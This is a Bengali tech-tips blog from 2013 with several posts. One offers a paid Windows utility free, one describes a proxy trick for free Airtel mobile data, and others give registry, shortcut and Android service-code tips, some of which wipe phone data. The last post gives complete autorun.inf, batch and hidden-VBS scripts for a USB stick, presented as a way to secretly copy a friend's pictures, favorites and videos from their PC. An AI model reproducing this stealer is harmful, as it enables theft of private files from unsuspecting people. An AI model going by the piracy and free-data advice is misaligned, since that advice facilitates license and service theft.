Live TV

Thursday, September 5, 2013

Windows 7 পিসিতে নানা রকম সমস্যা সমধানের জন্য এলো Windows 7 Manager 3.0.1

উইন্ডোজ ৭ নানাবিধ সমস্যা সমাধানে চলে এলো এই দারুণ সফটওয়্যারটি. যাকে বলতে পারেন উইন্ডোজ ৭ সমস্যা সমাধানে একের ভিতর সবসফটওয়্যার অরিজিনাল দাম ৩৯.৩৫ U$ Dollar BUT ভয় নেই আমি সফটওয়্যারটি আপনাকে সম্পূর্ণ ফ্রিতে দিচ্ছি

তাহলে দেরি না ডাউনলোড করুন এখুনি

এর সফটওয়্যারটির যা কিছু বৈশিষ্ট্ সব নিম্নে দেওয়া হলোঃ

Windows 7 Manager is a system utility that helps you optimize, tweak, repair and clean up Windows 7. It will increase your system speed, eliminate system fault, improve system security, and meet all of your expectations.Windows 7 Manager is a system utility that helps you optimize, tweak, repair and clean up Windows 7. It will increase your system speed, eliminate system fault, improve system security, and meet all of your expectations.
Features and Benefits of Windows 7 Manager

Information:
Get detailed system and all hardware information on your system; help you find out the installation key of Windows, Office products; show all detailed information of running processes and threads on your machine; Windows 7 Manager offers 1-clicking Cleaner cleans your system automatically; Repair Center helps you to fix various system problems.

Optimizer:
Tweak your system to improve windows startup and shutdown speed, tweak your hardware to increase system speed and performance; Control what is started on Windows startup, check and repair the advanced starup items to restore the malicious change by viruses; Tune up and optimize system services and Task Schedule, turn off smartly some unnecessary system services and tasks to improve system performance.

Cleaner:
Find out which files or folders engross your disk space and shown with chart; Smart Uninstaller can fully delete programs from your system without residual files and Registry entries; Find and clean junk files to increase Hard Disk space; Duplicate Files Finder can scan your computer for files with the same size, name and modification time; Registry Cleaner checks and repair incorrectly linked Registry entries; Registry Defrag rebuilds and re-indexes your Registry to reduce registry access time and therefore improve application responsiveness; Desktop Cleaner can clean useless icons and files on Desktop easily.

Customization:
Customize the look of your system by tweaking system Explorer, Desktop, Start Menu, Taskbar and notification area; Create the quick startup items on Taskbar with the Jump List launcher; Tune up Windows 7 boot menu; edit context menus of mouse Right-Clicking; Create the shortcut that executed quick on run dialog box. Visual Customizer can change system and file type icons, custom the logon background.

Security:
Improve system security by tweaking system components, UAC and login settings; Tune up System Restore options; Hide and restrict to access drives and programs; Encrypt/decrypt files, move system folders to safe locations; Privacy Protector can maintain your personal privacy by eliminating the tracks that you leave behind; Hide, add or delete the Control Panel entries.

Network:
Optimize your Internet connection speed, manage all shares items; Tweak your Internet Explorer easily; IP Switcher can switch your IP address easily on different networks.

Misc. Utilities:
Show the collection of Windows utilities; split and merge any files; Automatically back up files regularly using Super Copy. Registry Tools help you to operate Registry easily.

Changes in 3.0.1:
Repair Center updated to v3.0
Context Menu Manager updated to v3.0
Privacy Protector updated to v4.0
JumpList Quick Launcher updated to v3.0
Process Manager updated to v3.0
Task Scheduler Manager updated to v3.0
System Information updated to v2.0
IP Swithcer updated to 2.1
My Task updated to v1.1
Optimization Wizard updated to v2.0
1-Click Cleaner updated to v2.3
Startup Manager updated to v2.0
Service Manager updated to v3.0
Disk Analyzer updated to v2.0
Smart Uninstaller updated to v3.0
Junk File Cleaner updated to v3.0

ডাউনলোড লিঙ্কঃ


Monday, July 8, 2013

মাহে রমজানের সময় সূচি!

বিঃদ্রঃ ক্যালেন্ডার টি নিচের লিঙ্ক থেকে ও ডাউনলোড করতে পারবেন।
 এখানে ক্লিক করুন

Saturday, July 6, 2013

এয়ারটেলে ফ্রী নেট।।



মহান আল্লাহর নামে: শুরু করছি কারন তিনিই সবকিছুর মালিক।।
এয়ারটেলে ফ্রী নেট।।

সকল সফট ওয়্যার গুলো আপনাকে দেয়া হবে তবে তার আগে আপনাকে নিচের শর্তগুলো মানতে হবে
এয়ারটেলে ফ্রীর জন্য দেয়া যেকোন সফটওয়্যার এর মাধ্যমে কোন খারাপ ফাইল ডাওনলোড করতে পারবেন না
নিজের নামে নিজের সাইটে শেয়ার করতে পারবেন না তবে ট্রিকবিডি এর নাম উল্লেখ করে পারবেন
কোথাও টাকা দিয়ে বিক্রি করতে পারবেন না

যাইহোক কাজ শুরু করিপ্রথমেই আপনার এয়ারটেল সীমে ১ টা নেট প্যাকেজ এক্টিভ করে নিন
আমি সাজেষ্ট করবো ৩০ টাকা দিয়ে ২০ এমবি প্যাকেজ টা নেয়ার জন্যকারন এই প্যাকেজ এক্টিভের মাধ্যমে আপনি ১৫ দিন ফ্রী ব্যবহার করতে পারবেন
প্যাকেজ এক্টিভ করতে ডায়াল করুন *121#

তারপর আপনার ফোন যদি নোকিয়া জাবা হয় তবে নিচের Prov file টা ডাওনলোড করে নিন
Opera mini.prov

এই সেটিংস টা আপনার বন্ধুর চায়না ফোনে পাঠান সেখান থেকে আবার আপনার ফোনেযেহেতু বহুদিন আগে থেকে ব্যবহার করে আসছেন তাই এটা নিয়ে বেশী কিছু বলবো না
তারপর আপনার ফোনের কনফিগারশন এ যান সেখান থেকে Rana নামের সেটিংস টা ডিফল্ট করুন
তারপর নিচের Active default in all app option টায় ক্লিক করুন

সিম্বিয়ান,চায়না,এন্ড্রয়েড সেটিংসঃ
Name: airTel free by trickbd
proxy:141.0.11.251
port:80
apn:internet
home page:trickbd.com

তারপর নিচ থেকে আপনার চাহিদা অনুযায়ী ওপেরা মিনি ডাওনলোড করুন

Get all opera for airTel free net

এন্ড্রয়েড ব্যবহারকারীরা ওপরের সেটিংস টা করুন তারপর নিচের ওপেরা হ্যান্ডেলার টা ডাওনলোড করুন
Opera handler.apk

তারপর এটা ওপেন করে নিচের মতো সেটিংস করুন
Proxy type:http
proxy server:0.facebook.com

অথবা এন্ড্রয়েড ব্যবহার কারীরা এয়ারটেলের ডিফল্ট সেটিংস দিয়ে Real host ট্রিক ও ব্যবহার করতে পারেন
Proxy type: real host
proxy server:0.facebook.com

আর কি ফ্রী চালান এয়ারটেল দিয়েখুব
Note: আপনার ফোনে Mb রাখতে হবে কিন্তু তা কাটলেও অনেক সামান্য কাটবেসেই Mb টা ফেইসবুক চ্যাট সফট অথবা Binu ব্যবহার করে খরচ করতে পারেন
বিঃ দ্রঃ টিপস টি TRICKBD.COM থেকে কপি করা

Powered by S. M.TECHNOLOGY



Mobile technology

Mobile technology is the technology used for cellular communication. Mobile technology  has evolved rapidly over the past few year. Since the start of this millennium a standard mobile device has gone from being no more than a simple two-way to being a mobile phone, GPS navigation device, an embedded web browser an instant messaging client and a handheld game console. Many experts argue that the future of computer technology  rests in mobile computing with wireless networking. Mobile computing by way of tablet computers are becoming more popular.

Monday, June 17, 2013

Safely Remove Hardware এর জন্য ডেস্কটপ শর্টকাট


** প্রথমে ডেস্কটপের উপর রাইট বাটন ক্লিক করে New থেকে Shorcut ক্লিক করুন।


** এর পর লাল রঙের কোডটুকু কপি করে পেষ্ট করুন;
RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll

** তারপর Next ক্লিক করুন।

** এর পর Safety Remove USB লিখে Finish বাটনে ক্লিক করুন।

** ব্যাস আপনার কাজ শেষ। হ্যা এটা Windows XP/Vista/7 এর জন্য প্রযোজ্য

 FACEBOOK PAGEhtt://www.fb.com/smtechnology

Tuesday, June 11, 2013

Customize the Windows 7 log-on screen


উইন্ডোজ এর লগ অন স্ক্রিণ চেন্জ এর জন্য প্রথমে আপনাকে যেতে হবে Run Run গিয়ে Regedit লিখে enter চাপুন তারপর চলেযান নিচের মত করে HKEY_LOCAL_MACHINE/Software\Microsoft\Windows\CurrentVersion\Authentication\ LogonUI\Background গিয়ে ডান পাশে দেখবেন OEMBackground
তাতে ডাবল ক্লিক করুণ তারপর দেখবেন একটা বক্স এসেছে সেই বক্সের Value data: ঘরের 0 কে 1 বানিয়ে দিয়ে ok করুণ
বিঃদ্রঃ OEMBackground যদি না পান তাহলে স্থানে মাউসের রাইট পাশের কী চাপুন তাহলে দেখবেন New এখানে গিয়ে DWORD (32-bit) Value তে ক্লিক করুণ তাহলে দেখবেন New Value তৈরি হয়েছে। তখন সেটার নাম Rename করে লিখুন OEMBackground
তারপর আপনার পছন্দ মত ছবি নিন যার সাইজ হতে হবে 256KB এর মধ্যে হতে হবে। ছবি নির্বাচন হয়ে গেলে সেই ছবিটি কপি করে চলেযান নিচের মত করে
C:\Windows\system32\oobe\info\backgrounds folder গিয়ে ছবিটি পেস্ট করুণ এবং তার নাম দিন backgroundDefault ব্যাস কাজ শেষ তারপর কম্পউটার Reboot করুণ আর উপবভাগ করুণ আপনার লগ অন স্ক্রিণ
বি:দ্র: oobe folder গিয়ে যারা info\backgrounds folder না পাবেন তারা নিজেরা এই folder তৈরি করে নিন তাহলে কাজ হয়ে যাবে

Facebook                                                      Facebook Page

Sunday, June 2, 2013

অ্যান্ড্রয়েড এর কিছু গুরুত্বপূর্ণ সিকিউরিটি কোড!

অ্যান্ড্রয়েড ফোন এর জন্য রয়েছে অনেক সিক্রেট কোড যা আমরা অনেকেই জানিনাএই কোড গুলো ব্যবহার করে আপনি আপনার অ্যান্ড্রয়েড ফোন এর বিভিন্ন সেটিংস্‌ পরিবর্তন -ফোনে বিভিন্ন টেস্ট পরিচালনা করতে পারবেনতো চলুন দেখে নিই কিছু সিক্রেট কোড *#06# –  IMEI নাম্বার প্রদর্শন করবে
*2767*3855# –   ফ্যাক্টরি রিসেট কোড( ফনের সব ডাটা ডিলিট হয়ে যাবে )
*#*#4636#*#* -   ফোন এবং ব্যাটারি সংক্রান্ত তথ্য
*#*#273282*255*663282*#*#* -   সকল মিডিয়া ফাইল ব্যাক আপ করার কোড
*#*#197328640#*#* –  সার্ভিস  টেস্ট মোড কোড
*#*#1111#*#* –   FTA সফটওয়্যার ভার্সন
*#*#1234#*#* –    PDA এবং firmware ভার্সন
*#*#232339#*#* –   Wireless LAN টেস্ট কোড
*#*#0842#*#* –   ব্যাক লাইট ও ভাইব্রেসন টেস্ট কোড
*#12580*369# -   সফটওয়্যার এবং হার্ডওয়্যার ইনফর্মেশন
*#*#2664#*#* –    টাচ স্ক্রীন টেস্ট কোড
*#9900# –  সিস্টেম ডাম্প মোড
*#9090# – ডায়াগনস্টিক কনফিগারেশন
*#*#34971539#*#* –  ক্যামেরা ইনফর্মেশন
*#872564# –    ইউএসবি লগিন কন্ট্রোল
*#301279# –    HSDPA/HSUPA  কন্ট্রোল মেনু
*#7465625# –  ফোন লক স্ট্যাটাস
*#*#7780#*#*   –     ফ্যাক্টরি রি-স্টোর সেটিংগুগল অ্যাকাউন্ট সহ সকল সিস্টেম ডাটা মুছে যাবে
*2767*3855#   –     ফ্যাক্টরি ফরম্যাট সেটিংসকল ইন্টারনাল এবং এক্সটারনাল ডাটা মুছে যাবে এবং ফার্মওয়্যার রি-ইন্সটল হবে
*#*#4636#*#*   –    ফোন এবং ব্যাটারি ইনফর্মেশন
*#*#273283*255*663282*#*#* -    ফাইল কপি স্ক্রীনসব ইমেজ, সাউন্ড, ভিডিও, ভয়েস মেমো ব্যাক আপ করা যাবে
*#*#197328640#*#*    - সার্ভিস মোড কোডবিভিন্ন টেস্ট ও সেটিং বদলানোর জন্য
*#*#7594#*#*   –    এই কোড আপনার ইন্ড কল/ পাওয়ার বাটন কে ডাইরেক্ট পাওয়ার অফ বাটন এ পরিনত করবে
*#*#8255#*#*  -    G Talk সার্ভিস মনিটর কোড
*#*#34971539#*#*    -    ক্যামেরা ইনফর্মেশনক্যামেরা ফার্মওয়্যার আপডেট অপশন টি ব্যবহার করবেন নাএতে আপনার ক্যামেরা ফাংশন বন্ধ হয়ে যাবে

W-LAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#*   –  W-LAN টেস্ট কোডটেস্ট শুরু করার জন্য মেনু বাটন ব্যবহার করুন
*#*#232338#*#*    -  ওয়াইফাই ম্যাক এড্রেস
*#*#1472365#*#*    -  জিপিএস টেস্ট
*#*#1575#*#*    -  আরেকটি জিপিএস টেস্ট কোড
*#*#232331#*#*   –  Bluetooth টেস্ট কোড
*#*#232337#*#    -  Bluetooth ডিভাইস ইনফর্মেশতেস
*#*#0588#*#*    - প্রক্সিমিটি সেন্সর টেস্ট
*#*#0*#*#*    -  এলসিডি টেস্ট
*#*#2664#*#*   –  টাচ স্ক্রীন টেস্ট
*#*#2663#*#*    -  টাচ স্ক্রীন ভার্সন
*#*#0283#*#*   –  প্যাকেট লুপ ব্যাক
*#*#0673#*#* OR *#*#0289#*#*    -  মেলোডি টেস্ট
*#*#3264#*#*    -  র‍্যাম ভার্সন টেস্ট


Sunday, April 28, 2013

ফ্রী! ফ্রী! ফ্রী! মোবাইল এ ফ্রী টক টাইম

 mCent থেকে বিনামূল্যে এয়ারটাইম অর্জন করুন
জরিপে অংশ নিয়ে বিনামূল্যে এয়ারটাইম অর্জন করুন।
mCent হল বিনামূল্যে এয়ারটাইম অর্জনের সহজ উপায়। 


১০০%  এয়ারটাইম পাবেন। বিশ্বাস নাহলে ট্রয় করে দেখুন। ট্রয় করলে তও আর টাকা কাগবেনা



 ৳ এখানে ক্লিক করুন ৳


আর কোন সমস্যা হলে এখানে ক্লিক করুন





Wednesday, April 24, 2013

আপনার Fring আপডেট করতে পারছেন না ? Fring বার বার ডিসকানেক্ট হয়ে যাচ্ছে ? সমাধানের জন্য এই দিকে দেখুন

আপনার Fring আপডেট করতে পারছেন না ? Fring বার বার ডিসকানেক্ট হয়ে যাচ্ছে ? সমাধানের জন্য এই দিকে দেখুন ...

আসসালামু আলাইকুম

সবাই কেমন আছেন ? Fring দিয়ে কী এখনও কথা বলতে পারছেন ? যদি আপনি নতুন ভার্সন ব্যবহার করে থাকেন তা হলে পারছেন । আর যদি পুরাতন হয় তাহলে মনে হয় এতক্ষনে fring ডিসকানেন্ট হয়ে গিয়েছে । কারন fring থেকে আমার মেইল এ একটা মেসেজ এসেছিল যে পহেলে মার্চ এর মধ্যে fring আপডেট না করলে পুরাতন একাউন্ট ডিসকানেণ্ট হয়ে যাবে ।
Fring
কয়েকদিন ধরে আমাকে নেটের কয়েকজন বন্ধু ফোন দিয়ে বলতেছে "তারা তাদের Fring software টা আপডেট করতে পারছে না । m.fring.com থেকে ডাওনলোড করলেও কাজ হয় না ।" তখন আমি তাদেরকে এই সমাধানটা দেই । সমস্যা টা আসলে সব মোবাইলের ক্ষেত্রে হয় না । syambian pre fp1 এবং syambian fp1ফোনগুলির ক্ষেত্রে হয়ে থাকে ।এই টার সমাধান একটাই তা হল নকিয়া অভিস্টোর থেকে আপনার ফোনের মডেল অনুসারে software টা নামাতে হবে । নকিয়া অভিস্টোর থেকে নামানোর ২ টা পদ্ধতি আছে ।
১.যাদের মোবাইল এ অভিস্টোর software টা আছে:
এইটা খুব সহজ পদ্ধতি প্রথমে আপনাকে একটা নকিয়া একাউন্ট খুলতে হবে ।তারপর আপনার ফোনের অভিস্টোর software টা খুলে sign in করুন , add device থেকে আপনার ফোনের মডেল টা সিলেক্ট করুন । তারপর সার্চ বক্সে fring লিখে সার্চ করে ডাওনলোড করে নিন । দেখুন এখন নতুন ভার্সন কাজ করছে কিনা ।
2)যাদের মোবাইল এ অভিস্টোর Software টা নেই:
প্রথমে একটা নকিয়া একাউন্ট খুলুন । তারপর store.ovi.com এ ডুকে add device থেকে আপনার ফোনের মডেলটা সিলেক্ট করে সেভ করুন ।তারপর পিসি থেকে store.ovi.com এ ডুকে sigh in করুন ।এখন আপনার ব্রাউজার এর এড্রেস বারে নিচের লিঙ্কটা লিখুন ।
http://store.ovi.com/content/9356/download/
address bar
দেখবেন ডাউনলোড হওয়া শুরু হয়েছে ।যদি .sis ফরমেট এ ডাওনলোড হয় তাহলে ভাল । কিন্তু খেয়াল করে দেখবেন যেই software টা ডাউনলোড হয়েছে তার ফরমেট হচ্ছে .sis.dm কিন্তু আমাদের দরকার শুধু .sis ফরমেট ।অনেকে চিন্তা করতেছেন rename করে শুধু .dm কেটে দিলেই হবে আসলে শুধু তা করলে হবে না ।
fring
প্রথমে software টা কে notepad++ দিয়ে ওপেন করতে হবে ।তারপর লক্ষ্য করবেন সবার প্রথমে এই রকম ৩ টা লাইন আছে )>
3 line remove
এই ৩ টা লাইন কেটে file থেকে সেভ এ ক্লিক করুন ।এখন software টা কে rename করে .dm কেটে আপনার মোবাইল এ install করুন ।১০০% কাজ হবে ।
কাজ হয়েছে কিনা তা কিন্তু কমেন্টে এ অবশ্যয় জানাবেন ।


Saturday, April 20, 2013

পেনড্রাইভ প্রবেশ করে হাতিয়ে নিন বন্ধুর পিসির সকল গোপন তথ্য ।



পেনড্রাইভ প্রবেশ করে হাতিয়ে নিন বন্ধুর  পিসির সকল  গোপন তথ্য আজ আপনাদের
দেখাবো কি ভাবে অন্য পিসির সকল গোপন তথ্য হাতিয়ে নেয়া যায়শুধুমাত্র পেনড্রাইভ ব্যাবহার করে
কথা বাড়াবো না  কাজ শুরু করা যাক প্রথমে নোটপ্যাড ওপেন করুন এবার নিচের কোডটি কপি করে নোটপ্যাডে পেস্ট করুন
[autorun]
icon=drive.ico open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
এটি কে autorun.inf
নামে সেভ করুন
১টি ফাইল হলো আবার নোটপ্যাড ওপেন করে নিচের কোডটা কপি করে পেস্ট করো
@echo off
:: variables /min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /
e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE% \pictures""%drive%\Data\My
pics"
%backupcmd% "%USERPROFILE%
\Favorites" "%drive%\Data
\Favorites"
%backupcmd% "%USERPROFILE% \videos""%drive%\Data\vids"
@echo off
cls
এটাকে File.bat নামে সেভ করো ২টা ফাইল হলো আবার নোটপ্যাড ওপেন করো নিচের কোড
কপি করে পেস্ট করো
CreateObject("Wscript.Shell"). Run """" & WScript.Arguments(0)
& """",0, False
এটিকে Invisible.vbs নামে সেভ করো ৩টা ফাইল হলো
আবার নোটপ্যাড ওপেন করো আর নিচের কোডটা কপি করে পেস্ট করতে হবে
wscript.exe \invisible.vbs file.bat
এটাকে Launch.bat নামে সেভ করুন ৪টা ফাইল হলো এবার পেনড্রাইভ প্রবেশ করে তাতে Data
নামে একটা ফোল্ডার করতে হবে ও তার ভিতর উক্ত ৪টি ফাইল নিতে হবে
তোমার কাজ শেষ এবার যে কোন কম্পিউটারে পেন্ড্রাইভ ঢুকিয়ে বের করো আর সকল তথ্য
পেয়ে যাও । 

বিঃদ্রঃ এটা দিয়ে কারও ক্ষতি করবেন না।